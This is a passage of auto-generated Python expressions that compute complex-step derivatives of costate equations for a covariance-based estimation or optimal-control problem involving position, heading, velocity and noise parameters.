y_s**2*(1.0e-100*1j + y_n)**2 - 2*y_s*yb*(1.0e-100*1j + y_n) + yb**2)) + lamP23_N*p13_n*p13_s*p22_n*p22_s*xb*y_s*(1.0e-100*1j + 
y_n)/(Dt*p23_s*sigr**2*(x_n**2*x_s**2 - 2*x_n*x_s*xb + xb**2 + y_s**2*(1.0e-100*1j + y_n)**2 - 2*y_s*yb*(1.0e-100*1j + y_n) + yb**2)) - lamP23_N*p13_n*p13_s*p22_n*p22_s*xb*yb/(Dt*p23_s*sigr**2*(x_n**2*x_s**2 - 2*x_n*x_s*xb + xb**2 + y_s**2*(1.0e-100*1j + y_n)**2 - 2*y_s*yb*(1.0e-100*1j + y_n) + yb**2)) - lamP23_N*p22_n*p22_s*p23_n*y_s**2*(1.0e-100*1j + y_n)**2/(Dt*sigr**2*(x_n**2*x_s**2 - 2*x_n*x_s*xb + xb**2 + y_s**2*(1.0e-100*1j + y_n)**2 - 2*y_s*yb*(1.0e-100*1j + y_n) + yb**2)) + 2*lamP23_N*p22_n*p22_s*p23_n*y_s*yb*(1.0e-100*1j + y_n)/(Dt*sigr**2*(x_n**2*x_s**2 - 2*x_n*x_s*xb + xb**2 + y_s**2*(1.0e-100*1j + y_n)**2 - 2*y_s*yb*(1.0e-100*1j + y_n) + yb**2)) - lamP23_N*p22_n*p22_s*p23_n*yb**2/(Dt*sigr**2*(x_n**2*x_s**2 - 2*x_n*x_s*xb + xb**2 + y_s**2*(1.0e-100*1j + y_n)**2 - 2*y_s*yb*(1.0e-100*1j + y_n) + yb**2)) - lamP33_N*p13_n**2*p13_s**2*x_n**2*x_s**2/(Dt*p33_s*sigr**2*(x_n**2*x_s**2 - 2*x_n*x_s*xb + xb**2 + y_s**2*(1.0e-100*1j + y_n)**2 - 2*y_s*yb*(1.0e-100*1j + y_n) + yb**2)) + 2*lamP33_N*p13_n**2*p13_s**2*x_n*x_s*xb/(Dt*p33_s*sigr**2*(x_n**2*x_s**2 - 2*x_n*x_s*xb + xb**2 + y_s**2*(1.0e-100*1j + y_n)**2 - 2*y_s*yb*(1.0e-100*1j + y_n) + yb**2)) - lamP33_N*p13_n**2*p13_s**2*x_n*x_s*y_s*(1.0e-100*1j + y_n)/(Dt*p33_s*sigr**2*(x_n**2*x_s**2 - 2*x_n*x_s*xb + xb**2 + y_s**2*(1.0e-100*1j + y_n)**2 - 2*y_s*yb*(1.0e-100*1j + y_n) + yb**2)) + lamP33_N*p13_n**2*p13_s**2*x_n*x_s*yb/(Dt*p33_s*sigr**2*(x_n**2*x_s**2 - 2*x_n*x_s*xb + xb**2 + y_s**2*(1.0e-100*1j + y_n)**2 - 2*y_s*yb*(1.0e-100*1j + y_n) + yb**2)) - lamP33_N*p13_n**2*p13_s**2*xb**2/(Dt*p33_s*sigr**2*(x_n**2*x_s**2 - 2*x_n*x_s*xb + xb**2 + y_s**2*(1.0e-100*1j + y_n)**2 - 2*y_s*yb*(1.0e-100*1j + y_n) + yb**2)) + lamP33_N*p13_n**2*p13_s**2*xb*y_s*(1.0e-100*1j + y_n)/(Dt*p33_s*sigr**2*(x_n**2*x_s**2 - 2*x_n*x_s*xb + xb**2 + y_s**2*(1.0e-100*1j + y_n)**2 - 2*y_s*yb*(1.0e-100*1j + y_n) + yb**2)) - lamP33_N*p13_n**2*p13_s**2*xb*yb/(Dt*p33_s*sigr**2*(x_n**2*x_s**2 - 2*x_n*x_s*xb + xb**2 + y_s**2*(1.0e-100*1j + y_n)**2 
- 2*y_s*yb*(1.0e-100*1j + y_n) + yb**2)) - lamP33_N*p13_n*p13_s*p23_n*p23_s*x_n*x_s*y_s*(1.0e-100*1j + y_n)/(Dt*p33_s*sigr**2*(x_n**2*x_s**2 - 2*x_n*x_s*xb + xb**2 + y_s**2*(1.0e-100*1j + y_n)**2 - 2*y_s*yb*(1.0e-100*1j + y_n) + yb**2)) + lamP33_N*p13_n*p13_s*p23_n*p23_s*x_n*x_s*yb/(Dt*p33_s*sigr**2*(x_n**2*x_s**2 - 2*x_n*x_s*xb + xb**2 + y_s**2*(1.0e-100*1j + y_n)**2 - 2*y_s*yb*(1.0e-100*1j + y_n) + yb**2)) + lamP33_N*p13_n*p13_s*p23_n*p23_s*xb*y_s*(1.0e-100*1j + y_n)/(Dt*p33_s*sigr**2*(x_n**2*x_s**2 - 2*x_n*x_s*xb + xb**2 + y_s**2*(1.0e-100*1j + y_n)**2 - 2*y_s*yb*(1.0e-100*1j + y_n) + yb**2)) - lamP33_N*p13_n*p13_s*p23_n*p23_s*xb*yb/(Dt*p33_s*sigr**2*(x_n**2*x_s**2 - 2*x_n*x_s*xb + xb**2 + y_s**2*(1.0e-100*1j + y_n)**2 - 2*y_s*yb*(1.0e-100*1j + y_n) + yb**2)) - lamP33_N*p13_n*p13_s*p23_n*p23_s*y_s**2*(1.0e-100*1j + y_n)**2/(Dt*p33_s*sigr**2*(x_n**2*x_s**2 - 2*x_n*x_s*xb + xb**2 + y_s**2*(1.0e-100*1j + y_n)**2 - 2*y_s*yb*(1.0e-100*1j + y_n) + yb**2)) + 2*lamP33_N*p13_n*p13_s*p23_n*p23_s*y_s*yb*(1.0e-100*1j + y_n)/(Dt*p33_s*sigr**2*(x_n**2*x_s**2 - 2*x_n*x_s*xb + xb**2 + y_s**2*(1.0e-100*1j + y_n)**2 - 2*y_s*yb*(1.0e-100*1j + y_n) + yb**2)) - lamP33_N*p13_n*p13_s*p23_n*p23_s*yb**2/(Dt*p33_s*sigr**2*(x_n**2*x_s**2 - 2*x_n*x_s*xb + xb**2 + y_s**2*(1.0e-100*1j + y_n)**2 - 2*y_s*yb*(1.0e-100*1j + y_n) + yb**2)))/1e-100),
(tf)*(-np.imag(Dt*lamP11_N*sigv**2*cos(theta_s*(1.0e-100*1j + theta_n))**2/p11_s + Dt*lamP12_N*sigv**2*sin(theta_s*(1.0e-100*1j + theta_n))*cos(theta_s*(1.0e-100*1j + theta_n))/p12_s + Dt*lamP22_N*sigv**2*sin(theta_s*(1.0e-100*1j + theta_n))**2/p22_s - 2*lamP11_N*p13_n*p13_s*v*sin(theta_s*(1.0e-100*1j + theta_n))/p11_s - lamP12_N*p13_n*p13_s*v*sin(theta_s*(1.0e-100*1j + theta_n))/p12_s + lamP12_N*p13_n*p13_s*v*cos(theta_s*(1.0e-100*1j + theta_n))/p12_s - lamP13_N*p33_n*p33_s*v*sin(theta_s*(1.0e-100*1j + theta_n))/p13_s + lamP22_N*p13_n*p13_s*v*cos(theta_s*(1.0e-100*1j + theta_n))/p22_s + lamP22_N*p23_n*p23_s*v*cos(theta_s*(1.0e-100*1j + theta_n))/p22_s + lamP23_N*p33_n*p33_s*v*cos(theta_s*(1.0e-100*1j + theta_n))/p23_s + lamX_N*v*cos(theta_s*(1.0e-100*1j + theta_n))/x_s + lamY_N*v*sin(theta_s*(1.0e-100*1j + theta_n))/y_s)/1e-100),
(tf)*(-np.imag(-lamP11_N*p11_s*x_n**2*x_s**2*(1.0e-100*1j + p11_n)**2/(Dt*sigr**2*(x_n**2*x_s**2 - 2*x_n*x_s*xb + xb**2 + y_n**2*y_s**2 - 2*y_n*y_s*yb + yb**2)) + 2*lamP11_N*p11_s*x_n*x_s*xb*(1.0e-100*1j + p11_n)**2/(Dt*sigr**2*(x_n**2*x_s**2 - 2*x_n*x_s*xb + xb**2 + y_n**2*y_s**2 - 2*y_n*y_s*yb + yb**2)) - lamP11_N*p11_s*xb**2*(1.0e-100*1j + p11_n)**2/(Dt*sigr**2*(x_n**2*x_s**2 - 2*x_n*x_s*xb + xb**2 + y_n**2*y_s**2 - 2*y_n*y_s*yb + yb**2)) - 2*lamP11_N*p12_n*p12_s*x_n*x_s*y_n*y_s*(1.0e-100*1j + p11_n)/(Dt*sigr**2*(x_n**2*x_s**2 - 2*x_n*x_s*xb + xb**2 + y_n**2*y_s**2 - 2*y_n*y_s*yb + yb**2)) + 2*lamP11_N*p12_n*p12_s*x_n*x_s*yb*(1.0e-100*1j + p11_n)/(Dt*sigr**2*(x_n**2*x_s**2 - 2*x_n*x_s*xb + xb**2 + y_n**2*y_s**2 - 2*y_n*y_s*yb + yb**2)) + 2*lamP11_N*p12_n*p12_s*xb*y_n*y_s*(1.0e-100*1j + p11_n)/(Dt*sigr**2*(x_n**2*x_s**2 - 2*x_n*x_s*xb + xb**2 + y_n**2*y_s**2 - 2*y_n*y_s*yb + yb**2)) - 2*lamP11_N*p12_n*p12_s*xb*yb*(1.0e-100*1j + p11_n)/(Dt*sigr**2*(x_n**2*x_s**2 - 2*x_n*x_s*xb + xb**2 + y_n**2*y_s**2 - 2*y_n*y_s*yb + yb**2)) - lamP12_N*p11_s*p12_n*x_n**2*x_s**2*(1.0e-100*1j + p11_n)/(Dt*sigr**2*(x_n**2*x_s**2 - 2*x_n*x_s*xb + xb**2 + y_n**2*y_s**2 - 2*y_n*y_s*yb + yb**2)) + 2*lamP12_N*p11_s*p12_n*x_n*x_s*xb*(1.0e-100*1j + p11_n)/(Dt*sigr**2*(x_n**2*x_s**2 - 2*x_n*x_s*xb + xb**2 + y_n**2*y_s**2 - 2*y_n*y_s*yb + yb**2)) - lamP12_N*p11_s*p12_n*xb**2*(1.0e-100*1j + p11_n)/(Dt*sigr**2*(x_n**2*x_s**2 - 2*x_n*x_s*xb + xb**2 + y_n**2*y_s**2 - 2*y_n*y_s*yb + yb**2)) - lamP12_N*p11_s*p22_n*p22_s*x_n*x_s*y_n*y_s*(1.0e-100*1j + p11_n)/(Dt*p12_s*sigr**2*(x_n**2*x_s**2 - 2*x_n*x_s*xb + xb**2 + y_n**2*y_s**2 - 2*y_n*y_s*yb + yb**2)) + lamP12_N*p11_s*p22_n*p22_s*x_n*x_s*yb*(1.0e-100*1j + p11_n)/(Dt*p12_s*sigr**2*(x_n**2*x_s**2 - 2*x_n*x_s*xb + xb**2 + y_n**2*y_s**2 - 2*y_n*y_s*yb + yb**2)) + lamP12_N*p11_s*p22_n*p22_s*xb*y_n*y_s*(1.0e-100*1j + p11_n)/(Dt*p12_s*sigr**2*(x_n**2*x_s**2 - 2*x_n*x_s*xb + xb**2 + y_n**2*y_s**2 - 2*y_n*y_s*yb + yb**2)) - 
lamP12_N*p11_s*p22_n*p22_s*xb*yb*(1.0e-100*1j + p11_n)/(Dt*p12_s*sigr**2*(x_n**2*x_s**2 - 2*x_n*x_s*xb + xb**2 + y_n**2*y_s**2 - 2*y_n*y_s*yb + yb**2)) - lamP13_N*p11_s*p13_n*x_n**2*x_s**2*(1.0e-100*1j + p11_n)/(Dt*sigr**2*(x_n**2*x_s**2 - 2*x_n*x_s*xb + xb**2 + y_n**2*y_s**2 - 2*y_n*y_s*yb + yb**2)) + 2*lamP13_N*p11_s*p13_n*x_n*x_s*xb*(1.0e-100*1j + p11_n)/(Dt*sigr**2*(x_n**2*x_s**2 - 2*x_n*x_s*xb + xb**2 + y_n**2*y_s**2 - 2*y_n*y_s*yb + yb**2)) - lamP13_N*p11_s*p13_n*xb**2*(1.0e-100*1j + p11_n)/(Dt*sigr**2*(x_n**2*x_s**2 - 2*x_n*x_s*xb + xb**2 + y_n**2*y_s**2 - 2*y_n*y_s*yb + yb**2)) - lamP13_N*p11_s*p23_n*p23_s*x_n*x_s*y_n*y_s*(1.0e-100*1j + p11_n)/(Dt*p13_s*sigr**2*(x_n**2*x_s**2 - 2*x_n*x_s*xb + xb**2 + y_n**2*y_s**2 - 2*y_n*y_s*yb + yb**2)) + lamP13_N*p11_s*p23_n*p23_s*x_n*x_s*yb*(1.0e-100*1j + p11_n)/(Dt*p13_s*sigr**2*(x_n**2*x_s**2 - 2*x_n*x_s*xb + xb**2 + y_n**2*y_s**2 - 2*y_n*y_s*yb + yb**2)) + lamP13_N*p11_s*p23_n*p23_s*xb*y_n*y_s*(1.0e-100*1j + p11_n)/(Dt*p13_s*sigr**2*(x_n**2*x_s**2 - 2*x_n*x_s*xb + xb**2 + y_n**2*y_s**2 - 2*y_n*y_s*yb + yb**2)) - lamP13_N*p11_s*p23_n*p23_s*xb*yb*(1.0e-100*1j + p11_n)/(Dt*p13_s*sigr**2*(x_n**2*x_s**2 - 2*x_n*x_s*xb + xb**2 + y_n**2*y_s**2 - 2*y_n*y_s*yb + yb**2)))/1e-100),
(tf)*(-np.imag(-2*lamP11_N*p11_n*p12_s*x_n*x_s*y_n*y_s*(1.0e-100*1j + p12_n)/(Dt*sigr**2*(x_n**2*x_s**2 - 2*x_n*x_s*xb + xb**2 + y_n**2*y_s**2 - 2*y_n*y_s*yb + yb**2)) + 2*lamP11_N*p11_n*p12_s*x_n*x_s*yb*(1.0e-100*1j + p12_n)/(Dt*sigr**2*(x_n**2*x_s**2 - 2*x_n*x_s*xb + xb**2 + y_n**2*y_s**2 - 2*y_n*y_s*yb + yb**2)) + 2*lamP11_N*p11_n*p12_s*xb*y_n*y_s*(1.0e-100*1j + p12_n)/(Dt*sigr**2*(x_n**2*x_s**2 - 2*x_n*x_s*xb + xb**2 + y_n**2*y_s**2 - 2*y_n*y_s*yb + yb**2)) - 2*lamP11_N*p11_n*p12_s*xb*yb*(1.0e-100*1j + p12_n)/(Dt*sigr**2*(x_n**2*x_s**2 - 2*x_n*x_s*xb + xb**2 + y_n**2*y_s**2 - 2*y_n*y_s*yb + yb**2)) - lamP11_N*p12_s**2*y_n**2*y_s**2*(1.0e-100*1j + p12_n)**2/(Dt*p11_s*sigr**2*(x_n**2*x_s**2 - 2*x_n*x_s*xb + xb**2 + y_n**2*y_s**2 - 2*y_n*y_s*yb + yb**2)) + 2*lamP11_N*p12_s**2*y_n*y_s*yb*(1.0e-100*1j + p12_n)**2/(Dt*p11_s*sigr**2*(x_n**2*x_s**2 - 2*x_n*x_s*xb + xb**2 + y_n**2*y_s**2 - 2*y_n*y_s*yb + yb**2)) - lamP11_N*p12_s**2*yb**2*(1.0e-100*1j + p12_n)**2/(Dt*p11_s*sigr**2*(x_n**2*x_s**2 - 2*x_n*x_s*xb + xb**2 + y_n**2*y_s**2 - 2*y_n*y_s*yb + yb**2)) - lamP12_N*p11_n*p11_s*x_n**2*x_s**2*(1.0e-100*1j + p12_n)/(Dt*sigr**2*(x_n**2*x_s**2 - 2*x_n*x_s*xb + xb**2 + y_n**2*y_s**2 - 2*y_n*y_s*yb + yb**2)) + 2*lamP12_N*p11_n*p11_s*x_n*x_s*xb*(1.0e-100*1j + p12_n)/(Dt*sigr**2*(x_n**2*x_s**2 - 2*x_n*x_s*xb + xb**2 + y_n**2*y_s**2 - 2*y_n*y_s*yb + yb**2)) - lamP12_N*p11_n*p11_s*xb**2*(1.0e-100*1j + p12_n)/(Dt*sigr**2*(x_n**2*x_s**2 - 2*x_n*x_s*xb + xb**2 + y_n**2*y_s**2 - 2*y_n*y_s*yb + yb**2)) - lamP12_N*p12_s*x_n*x_s*y_n*y_s*(1.0e-100*1j + p12_n)**2/(Dt*sigr**2*(x_n**2*x_s**2 - 2*x_n*x_s*xb + xb**2 + y_n**2*y_s**2 - 2*y_n*y_s*yb + yb**2)) + lamP12_N*p12_s*x_n*x_s*yb*(1.0e-100*1j + p12_n)**2/(Dt*sigr**2*(x_n**2*x_s**2 - 2*x_n*x_s*xb + xb**2 + y_n**2*y_s**2 - 2*y_n*y_s*yb + yb**2)) + lamP12_N*p12_s*xb*y_n*y_s*(1.0e-100*1j + p12_n)**2/(Dt*sigr**2*(x_n**2*x_s**2 - 2*x_n*x_s*xb + xb**2 + y_n**2*y_s**2 - 2*y_n*y_s*yb + yb**2)) - lamP12_N*p12_s*xb*yb*(1.0e-100*1j + 
p12_n)**2/(Dt*sigr**2*(x_n**2*x_s**2 - 2*x_n*x_s*xb + xb**2 + y_n**2*y_s**2 - 2*y_n*y_s*yb + yb**2)) - lamP12_N*p22_n*p22_s*y_n**2*y_s**2*(1.0e-100*1j + p12_n)/(Dt*sigr**2*(x_n**2*x_s**2 - 2*x_n*x_s*xb + xb**2 + y_n**2*y_s**2 - 2*y_n*y_s*yb + yb**2)) + 2*lamP12_N*p22_n*p22_s*y_n*y_s*yb*(1.0e-100*1j + p12_n)/(Dt*sigr**2*(x_n**2*x_s**2 - 2*x_n*x_s*xb + xb**2 + y_n**2*y_s**2 - 2*y_n*y_s*yb + yb**2)) - lamP12_N*p22_n*p22_s*yb**2*(1.0e-100*1j + p12_n)/(Dt*sigr**2*(x_n**2*x_s**2 - 2*x_n*x_s*xb + xb**2 + y_n**2*y_s**2 - 2*y_n*y_s*yb + yb**2)) - lamP13_N*p12_s*p13_n*x_n*x_s*y_n*y_s*(1.0e-100*1j + p12_n)/(Dt*sigr**2*(x_n**2*x_s**2 - 2*x_n*x_s*xb + xb**2 + y_n**2*y_s**2 - 2*y_n*y_s*yb + yb**2)) + lamP13_N*p12_s*p13_n*x_n*x_s*yb*(1.0e-100*1j + p12_n)/(Dt*sigr**2*(x_n**2*x_s**2 - 2*x_n*x_s*xb + xb**2 + y_n**2*y_s**2 - 2*y_n*y_s*yb + yb**2)) + lamP13_N*p12_s*p13_n*xb*y_n*y_s*(1.0e-100*1j + p12_n)/(Dt*sigr**2*(x_n**2*x_s**2 - 2*x_n*x_s*xb + xb**2 + y_n**2*y_s**2 - 2*y_n*y_s*yb + yb**2)) - lamP13_N*p12_s*p13_n*xb*yb*(1.0e-100*1j + p12_n)/(Dt*sigr**2*(x_n**2*x_s**2 - 2*x_n*x_s*xb + xb**2 + y_n**2*y_s**2 - 2*y_n*y_s*yb + yb**2)) - lamP13_N*p12_s*p23_n*p23_s*y_n**2*y_s**2*(1.0e-100*1j + p12_n)/(Dt*p13_s*sigr**2*(x_n**2*x_s**2 - 2*x_n*x_s*xb + xb**2 + y_n**2*y_s**2 - 2*y_n*y_s*yb + yb**2)) + 2*lamP13_N*p12_s*p23_n*p23_s*y_n*y_s*yb*(1.0e-100*1j + p12_n)/(Dt*p13_s*sigr**2*(x_n**2*x_s**2 - 2*x_n*x_s*xb + xb**2 + y_n**2*y_s**2 - 2*y_n*y_s*yb + yb**2)) - lamP13_N*p12_s*p23_n*p23_s*yb**2*(1.0e-100*1j + p12_n)/(Dt*p13_s*sigr**2*(x_n**2*x_s**2 - 2*x_n*x_s*xb + xb**2 + y_n**2*y_s**2 - 2*y_n*y_s*yb + yb**2)) - lamP22_N*p12_s**2*x_n**2*x_s**2*(1.0e-100*1j + p12_n)**2/(Dt*p22_s*sigr**2*(x_n**2*x_s**2 - 2*x_n*x_s*xb + xb**2 + y_n**2*y_s**2 - 2*y_n*y_s*yb + yb**2)) + 2*lamP22_N*p12_s**2*x_n*x_s*xb*(1.0e-100*1j + p12_n)**2/(Dt*p22_s*sigr**2*(x_n**2*x_s**2 - 2*x_n*x_s*xb + xb**2 + y_n**2*y_s**2 - 2*y_n*y_s*yb + yb**2)) - lamP22_N*p12_s**2*xb**2*(1.0e-100*1j + 
p12_n)**2/(Dt*p22_s*sigr**2*(x_n**2*x_s**2 - 2*x_n*x_s*xb + xb**2 + y_n**2*y_s**2 - 2*y_n*y_s*yb + yb**2)) - 2*lamP22_N*p12_s*p22_n*x_n*x_s*y_n*y_s*(1.0e-100*1j + p12_n)/(Dt*sigr**2*(x_n**2*x_s**2 - 2*x_n*x_s*xb + xb**2 + y_n**2*y_s**2 - 2*y_n*y_s*yb + yb**2)) + 2*lamP22_N*p12_s*p22_n*x_n*x_s*yb*(1.0e-100*1j + p12_n)/(Dt*sigr**2*(x_n**2*x_s**2 - 2*x_n*x_s*xb + xb**2 + y_n**2*y_s**2 - 2*y_n*y_s*yb + yb**2)) + 2*lamP22_N*p12_s*p22_n*xb*y_n*y_s*(1.0e-100*1j + p12_n)/(Dt*sigr**2*(x_n**2*x_s**2 - 2*x_n*x_s*xb + xb**2 + y_n**2*y_s**2 - 2*y_n*y_s*yb + yb**2)) - 2*lamP22_N*p12_s*p22_n*xb*yb*(1.0e-100*1j + p12_n)/(Dt*sigr**2*(x_n**2*x_s**2 - 2*x_n*x_s*xb + xb**2 + y_n**2*y_s**2 - 2*y_n*y_s*yb + yb**2)) - lamP23_N*p12_s*p13_n*p13_s*x_n**2*x_s**2*(1.0e-100*1j + p12_n)/(Dt*p23_s*sigr**2*(x_n**2*x_s**2 - 2*x_n*x_s*xb + xb**2 + y_n**2*y_s**2 - 2*y_n*y_s*yb + yb**2)) + 2*lamP23_N*p12_s*p13_n*p13_s*x_n*x_s*xb*(1.0e-100*1j + p12_n)/(Dt*p23_s*sigr**2*(x_n**2*x_s**2 - 2*x_n*x_s*xb + xb**2 + y_n**2*y_s**2 - 2*y_n*y_s*yb + yb**2)) - lamP23_N*p12_s*p13_n*p13_s*xb**2*(1.0e-100*1j + p12_n)/(Dt*p23_s*sigr**2*(x_n**2*x_s**2 - 2*x_n*x_s*xb + xb**2 + y_n**2*y_s**2 - 2*y_n*y_s*yb + yb**2)) - lamP23_N*p12_s*p23_n*x_n*x_s*y_n*y_s*(1.0e-100*1j + p12_n)/(Dt*sigr**2*(x_n**2*x_s**2 - 2*x_n*x_s*xb + xb**2 + y_n**2*y_s**2 - 2*y_n*y_s*yb + yb**2)) + lamP23_N*p12_s*p23_n*x_n*x_s*yb*(1.0e-100*1j + p12_n)/(Dt*sigr**2*(x_n**2*x_s**2 - 2*x_n*x_s*xb + xb**2 + y_n**2*y_s**2 - 2*y_n*y_s*yb + yb**2)) + lamP23_N*p12_s*p23_n*xb*y_n*y_s*(1.0e-100*1j + p12_n)/(Dt*sigr**2*(x_n**2*x_s**2 - 2*x_n*x_s*xb + xb**2 + y_n**2*y_s**2 - 2*y_n*y_s*yb + yb**2)) - lamP23_N*p12_s*p23_n*xb*yb*(1.0e-100*1j + p12_n)/(Dt*sigr**2*(x_n**2*x_s**2 - 2*x_n*x_s*xb + xb**2 + y_n**2*y_s**2 - 2*y_n*y_s*yb + yb**2)))/1e-100),
(tf)*(-np.imag(-2*lamP11_N*p13_s*v*(1.0e-100*1j + p13_n)*sin(theta_n*theta_s)/p11_s - lamP12_N*p13_s*v*(1.0e-100*1j + p13_n)*sin(theta_n*theta_s)/p12_s + lamP12_N*p13_s*v*(1.0e-100*1j + p13_n)*cos(theta_n*theta_s)/p12_s + lamP22_N*p13_s*v*(1.0e-100*1j + p13_n)*cos(theta_n*theta_s)/p22_s - lamP13_N*p11_n*p11_s*x_n**2*x_s**2*(1.0e-100*1j + p13_n)/(Dt*sigr**2*(x_n**2*x_s**2 - 2*x_n*x_s*xb + xb**2 + y_n**2*y_s**2 - 2*y_n*y_s*yb + yb**2)) + 2*lamP13_N*p11_n*p11_s*x_n*x_s*xb*(1.0e-100*1j + p13_n)/(Dt*sigr**2*(x_n**2*x_s**2 - 2*x_n*x_s*xb + xb**2 + y_n**2*y_s**2 - 2*y_n*y_s*yb + yb**2)) - lamP13_N*p11_n*p11_s*xb**2*(1.0e-100*1j + p13_n)/(Dt*sigr**2*(x_n**2*x_s**2 - 2*x_n*x_s*xb + xb**2 + y_n**2*y_s**2 - 2*y_n*y_s*yb + yb**2)) - lamP13_N*p12_n*p12_s*x_n*x_s*y_n*y_s*(1.0e-100*1j + p13_n)/(Dt*sigr**2*(x_n**2*x_s**2 - 2*x_n*x_s*xb + xb**2 + y_n**2*y_s**2 - 2*y_n*y_s*yb + yb**2)) + lamP13_N*p12_n*p12_s*x_n*x_s*yb*(1.0e-100*1j + p13_n)/(Dt*sigr**2*(x_n**2*x_s**2 - 2*x_n*x_s*xb + xb**2 + y_n**2*y_s**2 - 2*y_n*y_s*yb + yb**2)) + lamP13_N*p12_n*p12_s*xb*y_n*y_s*(1.0e-100*1j + p13_n)/(Dt*sigr**2*(x_n**2*x_s**2 - 2*x_n*x_s*xb + xb**2 + y_n**2*y_s**2 - 2*y_n*y_s*yb + yb**2)) - lamP13_N*p12_n*p12_s*xb*yb*(1.0e-100*1j + p13_n)/(Dt*sigr**2*(x_n**2*x_s**2 - 2*x_n*x_s*xb + xb**2 + y_n**2*y_s**2 - 2*y_n*y_s*yb + yb**2)) - lamP23_N*p12_n*p12_s*p13_s*x_n**2*x_s**2*(1.0e-100*1j + p13_n)/(Dt*p23_s*sigr**2*(x_n**2*x_s**2 - 2*x_n*x_s*xb + xb**2 + y_n**2*y_s**2 - 2*y_n*y_s*yb + yb**2)) + 2*lamP23_N*p12_n*p12_s*p13_s*x_n*x_s*xb*(1.0e-100*1j + p13_n)/(Dt*p23_s*sigr**2*(x_n**2*x_s**2 - 2*x_n*x_s*xb + xb**2 + y_n**2*y_s**2 - 2*y_n*y_s*yb + yb**2)) - lamP23_N*p12_n*p12_s*p13_s*xb**2*(1.0e-100*1j + p13_n)/(Dt*p23_s*sigr**2*(x_n**2*x_s**2 - 2*x_n*x_s*xb + xb**2 + y_n**2*y_s**2 - 2*y_n*y_s*yb + yb**2)) - lamP23_N*p13_s*p22_n*p22_s*x_n*x_s*y_n*y_s*(1.0e-100*1j + p13_n)/(Dt*p23_s*sigr**2*(x_n**2*x_s**2 - 2*x_n*x_s*xb + xb**2 + y_n**2*y_s**2 - 2*y_n*y_s*yb + yb**2)) + 
lamP23_N*p13_s*p22_n*p22_s*x_n*x_s*yb*(1.0e-100*1j + p13_n)/(Dt*p23_s*sigr**2*(x_n**2*x_s**2 - 2*x_n*x_s*xb + xb**2 + y_n**2*y_s**2 - 2*y_n*y_s*yb + yb**2)) + lamP23_N*p13_s*p22_n*p22_s*xb*y_n*y_s*(1.0e-100*1j + p13_n)/(Dt*p23_s*sigr**2*(x_n**2*x_s**2 - 2*x_n*x_s*xb + xb**2 + y_n**2*y_s**2 - 2*y_n*y_s*yb + yb**2)) - lamP23_N*p13_s*p22_n*p22_s*xb*yb*(1.0e-100*1j + p13_n)/(Dt*p23_s*sigr**2*(x_n**2*x_s**2 - 2*x_n*x_s*xb + xb**2 + y_n**2*y_s**2 - 2*y_n*y_s*yb + yb**2)) - lamP33_N*p13_s**2*x_n**2*x_s**2*(1.0e-100*1j + p13_n)**2/(Dt*p33_s*sigr**2*(x_n**2*x_s**2 - 2*x_n*x_s*xb + xb**2 + y_n**2*y_s**2 - 2*y_n*y_s*yb + yb**2)) + 2*lamP33_N*p13_s**2*x_n*x_s*xb*(1.0e-100*1j + p13_n)**2/(Dt*p33_s*sigr**2*(x_n**2*x_s**2 - 2*x_n*x_s*xb + xb**2 + y_n**2*y_s**2 - 2*y_n*y_s*yb + yb**2)) - lamP33_N*p13_s**2*x_n*x_s*y_n*y_s*(1.0e-100*1j + p13_n)**2/(Dt*p33_s*sigr**2*(x_n**2*x_s**2 - 2*x_n*x_s*xb + xb**2 + y_n**2*y_s**2 - 2*y_n*y_s*yb + yb**2)) + lamP33_N*p13_s**2*x_n*x_s*yb*(1.0e-100*1j + p13_n)**2/(Dt*p33_s*sigr**2*(x_n**2*x_s**2 - 2*x_n*x_s*xb + xb**2 + y_n**2*y_s**2 - 2*y_n*y_s*yb + yb**2)) - lamP33_N*p13_s**2*xb**2*(1.0e-100*1j + p13_n)**2/(Dt*p33_s*sigr**2*(x_n**2*x_s**2 - 2*x_n*x_s*xb + xb**2 + y_n**2*y_s**2 - 2*y_n*y_s*yb + yb**2)) + lamP33_N*p13_s**2*xb*y_n*y_s*(1.0e-100*1j + p13_n)**2/(Dt*p33_s*sigr**2*(x_n**2*x_s**2 - 2*x_n*x_s*xb + xb**2 + y_n**2*y_s**2 - 2*y_n*y_s*yb + yb**2)) - lamP33_N*p13_s**2*xb*yb*(1.0e-100*1j + p13_n)**2/(Dt*p33_s*sigr**2*(x_n**2*x_s**2 - 2*x_n*x_s*xb + xb**2 + y_n**2*y_s**2 - 2*y_n*y_s*yb + yb**2)) - lamP33_N*p13_s*p23_n*p23_s*x_n*x_s*y_n*y_s*(1.0e-100*1j + p13_n)/(Dt*p33_s*sigr**2*(x_n**2*x_s**2 - 2*x_n*x_s*xb + xb**2 + y_n**2*y_s**2 - 2*y_n*y_s*yb + yb**2)) + lamP33_N*p13_s*p23_n*p23_s*x_n*x_s*yb*(1.0e-100*1j + p13_n)/(Dt*p33_s*sigr**2*(x_n**2*x_s**2 - 2*x_n*x_s*xb + xb**2 + y_n**2*y_s**2 - 2*y_n*y_s*yb + yb**2)) + lamP33_N*p13_s*p23_n*p23_s*xb*y_n*y_s*(1.0e-100*1j + p13_n)/(Dt*p33_s*sigr**2*(x_n**2*x_s**2 - 2*x_n*x_s*xb + xb**2 + y_n**2*y_s**2 - 
2*y_n*y_s*yb + yb**2)) - lamP33_N*p13_s*p23_n*p23_s*xb*yb*(1.0e-100*1j + p13_n)/(Dt*p33_s*sigr**2*(x_n**2*x_s**2 - 2*x_n*x_s*xb + xb**2 + y_n**2*y_s**2 - 2*y_n*y_s*yb + yb**2)) - lamP33_N*p13_s*p23_n*p23_s*y_n**2*y_s**2*(1.0e-100*1j + p13_n)/(Dt*p33_s*sigr**2*(x_n**2*x_s**2 - 2*x_n*x_s*xb + xb**2 + y_n**2*y_s**2 - 2*y_n*y_s*yb + yb**2)) + 2*lamP33_N*p13_s*p23_n*p23_s*y_n*y_s*yb*(1.0e-100*1j + p13_n)/(Dt*p33_s*sigr**2*(x_n**2*x_s**2 - 2*x_n*x_s*xb + xb**2 + y_n**2*y_s**2 - 2*y_n*y_s*yb + yb**2)) - lamP33_N*p13_s*p23_n*p23_s*yb**2*(1.0e-100*1j + p13_n)/(Dt*p33_s*sigr**2*(x_n**2*x_s**2 - 2*x_n*x_s*xb + xb**2 + y_n**2*y_s**2 - 2*y_n*y_s*yb + yb**2)))/1e-100),
